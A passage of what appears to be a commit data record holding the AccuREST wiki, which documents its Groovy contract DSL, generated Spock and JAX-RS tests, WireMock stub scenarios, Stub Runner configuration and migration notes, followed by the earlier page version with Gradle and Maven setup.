}\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*][][]","old_contents":":github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> \/\/ for JUnit tests, use generateSpecs for Spock Specification\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification 